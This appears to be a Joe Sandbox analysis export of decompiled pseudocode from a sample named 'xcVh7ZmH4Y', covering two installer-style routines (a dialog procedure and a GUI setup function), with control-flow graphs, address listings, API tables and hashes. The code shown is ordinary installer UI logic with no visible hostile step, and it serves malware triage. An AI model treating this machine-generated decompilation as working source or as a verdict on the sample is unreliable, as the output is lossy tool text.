                                                control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 199 403fbe-403fc7 195->199 197 404171-404186 196->197 198 404124-40415f GetDlgItem * 2 call 404499 KiUserCallbackDispatcher call 40140b 196->198 201 4041c6-4041cb call 4044e5 197->201 202 404188-40418b 197->202 223 404164-40416c 198->223 203 403fc9-403fd6 SetWindowPos 199->203 204 403fdc-403fe3 199->204 211 4041d0-4041eb 201->211 208 40418d-404198 call 401389 202->208 209 4041be-4041c0 202->209 203->204 205 403fe5-403fff ShowWindow 204->205 206 404027-40402d 204->206 212 404100-40410e call 404500 205->212 213 404005-404018 GetWindowLongW 205->213 214 404046-404049 206->214 215 40402f-404041 DestroyWindow 206->215 208->209 235 40419a-4041b9 SendMessageW 208->235 209->201 218 404466 209->218 219 4041f4-4041fa 211->219 220 4041ed-4041ef call 40140b 211->220 224 404468-40446f 212->224 213->212 221 40401e-404021 ShowWindow 213->221 225 40404b-404057 SetWindowLongW 214->225 226 40405c-404062 214->226 222 404443-404449 215->222 218->224 232 404200-40420b 219->232 233 404424-40443d DestroyWindow EndDialog 219->233 220->219 221->206 222->218 231 40444b-404451 222->231 223->197 225->224 226->212 234 404068-404077 GetDlgItem 226->234 231->218 236 404453-40445c ShowWindow 231->236 232->233 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 232->237 233->222 238 404096-404099 234->238 239 404079-404090 SendMessageW IsWindowEnabled 234->239 235->224 236->218 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 241 40409b-40409c 238->241 242 40409e-4040a1 238->242 239->218 239->238 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->212 248 4040ea-4040fa SendMessageW 245->248 251 4040ab-4040ad 245->251 247 4040b6-4040bc 246->247 246->248 252 4040d3-4040dc call 40140b 247->252 253 4040be-4040c4 call 40140b 247->253 248->212 251->244 252->212 263 4040de-4040e8 252->263 262 4040ca 253->262 262->244 263->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->211 286 404339-40433b 275->286 286->211 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->222 291 40437e-4043ab CreateDialogParamW 288->291 289->218 290 404353-404359 289->290 290->211 292 40435f 290->292 291->222 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->218 293->218 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->222
                                                C-Code - Quality: 84%
                                                			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                				struct HWND__* _v28;
                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				struct HWND__* _t48;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t117;
                                                				int _t118;
                                                				int _t122;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				intOrPtr _t130;
                                                				long _t133;
                                                				int _t135;
                                                				int _t136;
                                                				void* _t137;
                                                				void* _t145;
                                                
                                                				_t130 = _a8;
                                                				if(_t130 == 0x110 || _t130 == 0x408) {
                                                					_t34 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t130 - 0x110;
                                                					 *0x42d250 = _t34;
                                                					if(_t130 == 0x110) {
                                                						 *0x434f08 = _t127;
                                                						 *0x42d264 = GetDlgItem(_t127, 1);
                                                						_t91 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x42b230 = _t91;
                                                						E00404499(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8); // executed
                                                						 *0x433ecc = E0040140B(4);
                                                						_t34 = 1;
                                                						__eflags = 1;
                                                						 *0x42d250 = 1;
                                                					}
                                                					_t124 =  *0x40a368; // 0x0
                                                					_t136 = 0;
                                                					_t133 = (_t124 << 6) +  *0x434f20;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L36:
                                                						E004044E5(0x40b);
                                                						while(1) {
                                                							_t36 =  *0x42d250;
                                                							 *0x40a368 =  *0x40a368 + _t36;
                                                							_t133 = _t133 + (_t36 << 6);
                                                							_t38 =  *0x40a368; // 0x0
                                                							__eflags = _t38 -  *0x434f24;
                                                							if(_t38 ==  *0x434f24) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x433ecc - _t136;
                                                							if( *0x433ecc != _t136) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t117 =  *(_t133 + 0x14);
                                                							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00404499(_t127);
                                                							_t48 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x434f8c - _t136;
                                                							_v28 = _t48;
                                                							if( *0x434f8c != _t136) {
                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t117;
                                                							}
                                                							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                							E004044BB(_t117 & 0x00000002);
                                                							_t118 = _t117 & 0x00000004;
                                                							EnableWindow( *0x42b230, _t118);
                                                							__eflags = _t118 - _t136;
                                                							if(_t118 == _t136) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t136);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                							__eflags =  *0x434f8c - _t136;
                                                							if( *0x434f8c == _t136) {
                                                								_push( *0x42d264);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t136);
                                                								_push( *0x42b230);
                                                							}
                                                							E004044CE();
                                                							E0040653D(0x42d268, E00403F7B());
                                                							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                							SetWindowTextW(_t127, 0x42d268); // executed
                                                							_push(_t136);
                                                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t133 - _t136;
                                                								if( *_t133 == _t136) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t133 + 4) - 5;
                                                								if( *(_t133 + 4) != 5) {
                                                									DestroyWindow( *0x433ed8); // executed
                                                									 *0x42c240 = _t133;
                                                									__eflags =  *_t133 - _t136;
                                                									if( *_t133 <= _t136) {
                                                										goto L60;
                                                									}
                                                									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                									__eflags = _t73 - _t136;
                                                									 *0x433ed8 = _t73;
                                                									if(_t73 == _t136) {
                                                										goto L60;
                                                									}
                                                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                									_push(6);
                                                									E00404499(_t73);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                									ScreenToClient(_t127, _t137 + 0x10);
                                                									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                									_push(_t136);
                                                									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                									__eflags =  *0x433ecc - _t136;
                                                									if( *0x433ecc != _t136) {
                                                										goto L63;
                                                									}
                                                									ShowWindow( *0x433ed8, 8); // executed
                                                									E004044E5(0x405);
                                                									goto L60;
                                                								}
                                                								__eflags =  *0x434f8c - _t136;
                                                								if( *0x434f8c != _t136) {
                                                									goto L63;
                                                								}
                                                								__eflags =  *0x434f80 - _t136;
                                                								if( *0x434f80 != _t136) {
                                                									continue;
                                                								}
                                                								goto L63;
                                                							}
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x434f08 = _t136;
                                                						EndDialog(_t127,  *0x42ba38);
                                                						goto L60;
                                                					} else {
                                                						__eflags = _t34 - 1;
                                                						if(_t34 != 1) {
                                                							L35:
                                                							__eflags =  *_t133 - _t136;
                                                							if( *_t133 == _t136) {
                                                								goto L63;
                                                							}
                                                							goto L36;
                                                						}
                                                						_push(0);
                                                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L35;
                                                						}
                                                						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                						__eflags =  *0x433ecc;
                                                						return 0 |  *0x433ecc == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t136 = 0;
                                                					if(_t130 == 0x47) {
                                                						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					_t122 = _a12;
                                                					if(_t130 != 5) {
                                                						L8:
                                                						if(_t130 != 0x40d) {
                                                							__eflags = _t130 - 0x11;
                                                							if(_t130 != 0x11) {
                                                								__eflags = _t130 - 0x111;
                                                								if(_t130 != 0x111) {
                                                									goto L28;
                                                								}
                                                								_t135 = _t122 & 0x0000ffff;
                                                								_t128 = GetDlgItem(_t127, _t135);
                                                								__eflags = _t128 - _t136;
                                                								if(_t128 == _t136) {
                                                									L15:
                                                									__eflags = _t135 - 1;
                                                									if(_t135 != 1) {
                                                										__eflags = _t135 - 3;
                                                										if(_t135 != 3) {
                                                											_t129 = 2;
                                                											__eflags = _t135 - _t129;
                                                											if(_t135 != _t129) {
                                                												L27:
                                                												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                												goto L28;
                                                											}
                                                											__eflags =  *0x434f8c - _t136;
                                                											if( *0x434f8c == _t136) {
                                                												_t99 = E0040140B(3);
                                                												__eflags = _t99;
                                                												if(_t99 != 0) {
                                                													goto L28;
                                                												}
                                                												 *0x42ba38 = 1;
                                                												L23:
                                                												_push(0x78);
                                                												L24:
                                                												E00404472();
                                                												goto L28;
                                                											}
                                                											E0040140B(_t129);
                                                											 *0x42ba38 = _t129;
                                                											goto L23;
                                                										}
                                                										__eflags =  *0x40a368 - _t136; // 0x0
                                                										if(__eflags <= 0) {
                                                											goto L27;
                                                										}
                                                										_push(0xffffffff);
                                                										goto L24;
                                                									}
                                                									_push(_t135);
                                                									goto L24;
                                                								}
                                                								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                								_t103 = IsWindowEnabled(_t128);
                                                								__eflags = _t103;
                                                								if(_t103 == 0) {
                                                									L63:
                                                									return 0;
                                                								}
                                                								goto L15;
                                                							}
                                                							SetWindowLongW(_t127, _t136, _t136);
                                                							return 1;
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x433ed8 = _t122;
                                                						L60:
                                                						_t145 =  *0x42f268 - _t136; // 0x1
                                                						if(_t145 == 0 &&  *0x433ed8 != _t136) {
                                                							ShowWindow(_t127, 0xa); // executed
                                                							 *0x42f268 = 1;
                                                						}
                                                						goto L63;
                                                					} else {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                							L28:
                                                							return E00404500(_a8, _t122, _a16);
                                                						} else {
                                                							ShowWindow(_t127, 4);
                                                							goto L8;
                                                						}
                                                					}
                                                				}
                                                			}
































                                                0x00403fa5
                                                0x00403fac
                                                0x00404113
                                                0x00404117
                                                0x0040411b
                                                0x0040411d
                                                0x00404122
                                                0x0040412d
                                                0x00404138
                                                0x0040413d
                                                0x0040413f
                                                0x00404141
                                                0x00404144
                                                0x00404149
                                                0x00404157
                                                0x00404164
                                                0x0040416b
                                                0x0040416b
                                                0x0040416c
                                                0x0040416c
                                                0x00404171
                                                0x00404177
                                                0x0040417e
                                                0x00404184
                                                0x00404186
                                                0x004041c6
                                                0x004041cb
                                                0x004041d0
                                                0x004041d0
                                                0x004041d5
                                                0x004041de
                                                0x004041e0
                                                0x004041e5
                                                0x004041eb
                                                0x004041ef
                                                0x004041ef
                                                0x004041f4
                                                0x004041fa
                                                0x00000000
                                                0x00000000
                                                0x00404205
                                                0x0040420b
                                                0x00000000
                                                0x00000000
                                                0x00404214
                                                0x0040421c
                                                0x00404221
                                                0x00404224
                                                0x0040422a
                                                0x0040422f
                                                0x00404232
                                                0x00404238
                                                0x0040423d
                                                0x00404240
                                                0x00404246
                                                0x0040424e
                                                0x00404254
                                                0x0040425a
                                                0x0040425e
                                                0x00404265
                                                0x00404265
                                                0x00404265
                                                0x0040426f
                                                0x00404281
                                                0x0040428d
                                                0x00404292
                                                0x0040429c
                                                0x004042a2
                                                0x004042a4
                                                0x004042a9
                                                0x004042a6
                                                0x004042a6
                                                0x004042a6
                                                0x004042b9
                                                0x004042d1
                                                0x004042d3
                                                0x004042d9
                                                0x004042ee
                                                0x004042db
                                                0x004042e4
                                                0x004042e6
                                                0x004042e6
                                                0x004042f4
                                                0x00404305
                                                0x0040431b
                                                0x00404322
                                                0x00404328
                                                0x0040432c
                                                0x00404331
                                                0x00404333
                                                0x00000000
                                                0x00404339
                                                0x00404339
                                                0x0040433b
                                                0x00000000
                                                0x00000000
                                                0x00404341
                                                0x00404345
                                                0x0040436a
                                                0x00404370
                                                0x00404376
                                                0x00404378
                                                0x00000000
                                                0x00000000
                                                0x0040439e
                                                0x004043a4
                                                0x004043a6
                                                0x004043ab
                                                0x00000000
                                                0x00000000
                                                0x004043b1
                                                0x004043b4
                                                0x004043b7
                                                0x004043ce
                                                0x004043da
                                                0x004043f3
                                                0x004043f9
                                                0x004043fd
                                                0x00404402
                                                0x00404408
                                                0x00000000
                                                0x00000000
                                                0x00404412
                                                0x0040441d
                                                0x00000000
                                                0x0040441d
                                                0x00404347
                                                0x0040434d
                                                0x00000000
                                                0x00000000
                                                0x00404353
                                                0x00404359
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040435f
                                                0x00404333
                                                0x0040442a
                                                0x00404436
                                                0x0040443d
                                                0x00000000
                                                0x00404188
                                                0x00404188
                                                0x0040418b
                                                0x004041be
                                                0x004041be
                                                0x004041c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004041c0
                                                0x0040418d
                                                0x00404191
                                                0x00404196
                                                0x00404198
                                                0x00000000
                                                0x00000000
                                                0x004041a8
                                                0x004041b0
                                                0x00000000
                                                0x004041b6
                                                0x00403fbe
                                                0x00403fbe
                                                0x00403fc2
                                                0x00403fc7
                                                0x00403fd6
                                                0x00403fd6
                                                0x00403fdc
                                                0x00403fe3
                                                0x00404027
                                                0x0040402d
                                                0x00404046
                                                0x00404049
                                                0x0040405c
                                                0x00404062
                                                0x00000000
                                                0x00000000
                                                0x00404068
                                                0x00404073
                                                0x00404075
                                                0x00404077
                                                0x00404096
                                                0x00404096
                                                0x00404099
                                                0x0040409e
                                                0x004040a1
                                                0x004040b1
                                                0x004040b2
                                                0x004040b4
                                                0x004040ea
                                                0x004040fa
                                                0x00000000
                                                0x004040fa
                                                0x004040b6
                                                0x004040bc
                                                0x004040d5
                                                0x004040da
                                                0x004040dc
                                                0x00000000
                                                0x00000000
                                                0x004040de
                                                0x004040ca
                                                0x004040ca
                                                0x004040cc
                                                0x004040cc
                                                0x00000000
                                                0x004040cc
                                                0x004040bf
                                                0x004040c4
                                                0x00000000
                                                0x004040c4
                                                0x004040a3
                                                0x004040a9
                                                0x00000000
                                                0x00000000
                                                0x004040ab
                                                0x00000000
                                                0x004040ab
                                                0x0040409b
                                                0x00000000
                                                0x0040409b
                                                0x00404081
                                                0x00404088
                                                0x0040408e
                                                0x00404090
                                                0x00404466
                                                0x00000000
                                                0x00404466
                                                0x00000000
                                                0x00404090
                                                0x0040404e
                                                0x00000000
                                                0x00404056
                                                0x00404035
                                                0x0040403b
                                                0x00404443
                                                0x00404443
                                                0x00404449
                                                0x00404456
                                                0x0040445c
                                                0x0040445c
                                                0x00000000
                                                0x00403fe5
                                                0x00403fea
                                                0x00403ff6
                                                0x00403fff
                                                0x00404100
                                                0x00000000
                                                0x0040401e
                                                0x00404021
                                                0x00000000
                                                0x00404021
                                                0x00403fff
                                                0x00403fe3

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                • DestroyWindow.USER32 ref: 00404035
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                • GetDlgItem.USER32 ref: 0040406D
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                • GetDlgItem.USER32 ref: 00404133
                                                • GetDlgItem.USER32 ref: 0040413D
                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404157
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                • GetDlgItem.USER32 ref: 0040424E
                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                • EnableMenuItem.USER32 ref: 004042B9
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                • String ID:
                                                • API String ID: 3618520773-0
                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cc6 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 325 403ccb-403cd4 321->325 325->320 328 403cd6-403cda 325->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 345 403df3-403df6 330->345 346 403dfb-403e06 call 403ec2 330->346 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 344 403d0a-403d14 GetFileAttributesW 340->344 349 403d16-403d18 344->349 350 403d1a-403d1b call 405e58 344->350 345->338 354 403e0c-403e26 ShowWindow call 40689a 346->354 355 403e8f-403e90 call 405672 346->355 349->339 349->350 350->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->335 361->345 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->345 367->368 372 403e84-403e8d call 403b3c 368->372 372->338
                                                C-Code - Quality: 96%
                                                			E00403BEC(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x434f10;
                                                				_t22 = E0040690A(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
                                                					_t76 = 0x42d268;
                                                					L"1033" = 0x30;
                                                					 *0x442002 = 0x78;
                                                					 *0x442004 = 0;
                                                					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                					__eflags =  *0x42d268;
                                                					if(__eflags == 0) {
                                                						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                				}
                                                				E00403EC2(_t78, _t90);
                                                				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
                                                				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                				 *0x434f9c = 0x10000;
                                                				if(E00405F14(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                                                					L16:
                                                					if(E00405F14(_t98, _t86) == 0) {
                                                						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                					}
                                                					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                					 *0x433ee8 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403EC2(_t78, __eflags);
                                                							__eflags =  *0x434fa0;
                                                							if( *0x434fa0 != 0) {
                                                								_t33 = E00405672(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x433ecc;
                                                								if( *0x433ecc == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x42d248, 5); // executed
                                                							_t39 = E0040689A("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E0040689A("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                								 *0x433ec4 = _t87;
                                                								RegisterClassW(0x433ea0);
                                                							}
                                                							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                							E00403B3C(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x434f00;
                                                						 *0x433ea4 = E00401000;
                                                						 *0x433eb0 =  *0x434f00;
                                                						 *0x433eb4 = _t30;
                                                						 *0x433ec4 = 0x40a380;
                                                						if(RegisterClassW(0x433ea0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					_t92 = _t78;
                                                					if(_t78 == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x432ea0;
                                                					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                					_t63 =  *0x432ea0; // 0x43
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x432ea2;
                                                						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E0040653D(_t86, E00405E0C(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405E58(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}
























                                                0x00403bf2
                                                0x00403bfb
                                                0x00403c02
                                                0x00403c04
                                                0x00403c18
                                                0x00403c2a
                                                0x00403c33
                                                0x00403c3c
                                                0x00403c43
                                                0x00403c48
                                                0x00403c4f
                                                0x00403c62
                                                0x00403c62
                                                0x00403c6d
                                                0x00403c06
                                                0x00403c11
                                                0x00403c11
                                                0x00403c72
                                                0x00403c7c
                                                0x00403c85
                                                0x00403c8a
                                                0x00403c9b
                                                0x00403d2d
                                                0x00403d35
                                                0x00403d3e
                                                0x00403d3e
                                                0x00403d54
                                                0x00403d5a
                                                0x00403d68
                                                0x00403de9
                                                0x00403df1
                                                0x00403dfb
                                                0x00403e00
                                                0x00403e06
                                                0x00403e90
                                                0x00403e95
                                                0x00403e97
                                                0x00403eb3
                                                0x00000000
                                                0x00403eb3
                                                0x00403e99
                                                0x00403e9f
                                                0x00403ea7
                                                0x00403ea7
                                                0x00000000
                                                0x00403e9f
                                                0x00403e14
                                                0x00403e1f
                                                0x00403e24
                                                0x00403e26
                                                0x00403e2d
                                                0x00403e2d
                                                0x00403e38
                                                0x00403e40
                                                0x00403e42
                                                0x00403e44
                                                0x00403e4d
                                                0x00403e50
                                                0x00403e56
                                                0x00403e56
                                                0x00403e75
                                                0x00403e86
                                                0x00000000
                                                0x00403e8b
                                                0x00403df3
                                                0x00403df5
                                                0x00000000
                                                0x00403d6a
                                                0x00403d6a
                                                0x00403d76
                                                0x00403d80
                                                0x00403d86
                                                0x00403d8b
                                                0x00403d9a
                                                0x00403eb8
                                                0x00403eb8
                                                0x00000000
                                                0x00403eb8
                                                0x00403da9
                                                0x00403de4
                                                0x00000000
                                                0x00403de4
                                                0x00403ca1
                                                0x00403ca1
                                                0x00403ca4
                                                0x00403ca6
                                                0x00000000
                                                0x00000000
                                                0x00403cb4
